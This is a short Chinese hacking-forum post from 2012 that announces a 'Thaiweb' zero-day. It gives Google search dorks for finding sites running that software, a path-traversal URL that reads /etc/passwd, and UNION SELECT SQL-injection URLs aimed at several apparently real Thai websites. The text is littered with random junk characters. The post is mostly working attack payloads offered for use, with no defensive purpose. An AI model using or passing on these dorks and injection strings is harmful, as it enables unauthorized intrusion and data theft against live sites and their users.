找回密码
 立即注册
查看: 2583|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
+ O; Z- \( W+ @
2 I3 |3 y, e$ v8 x# a, Lintext:powered by Thaiweb
% U2 k7 j0 r# {
# X$ G  s4 O, P: v3 s& U9 s. zinurl:index.php?page=board.php
; E3 d9 e0 a8 N  @. l0 e+ ~( I2 M0 E( ~

" V  b  H2 u! S1 T8 ~8 N9 s" e$ ~1 D2 q* q7 E
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
, R1 x( X8 Q- v# E' ]
1 Q. Z( f0 m- B. l, n- T9 }: S
7 W& n$ \- U0 O$ Z" k( q+ M% `+ C+ H' J
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4') R, }% Z; N: E

* {8 l! P( V3 [  L- Q9 U) |" w1 b) D
6 y. Y7 Y: G0 [, d' d
! A' \3 h+ `4 v- W- d$ [/ yhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
2 s# a$ P; ?8 c0 x8 w( Q7 G
! }, A) x1 S! ahttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
) A4 O! P8 S; e. Z/ E . C! D% ?1 n5 G( @/ X& ?& s
http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--# G- q6 {( e1 _( {. J( Y; i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表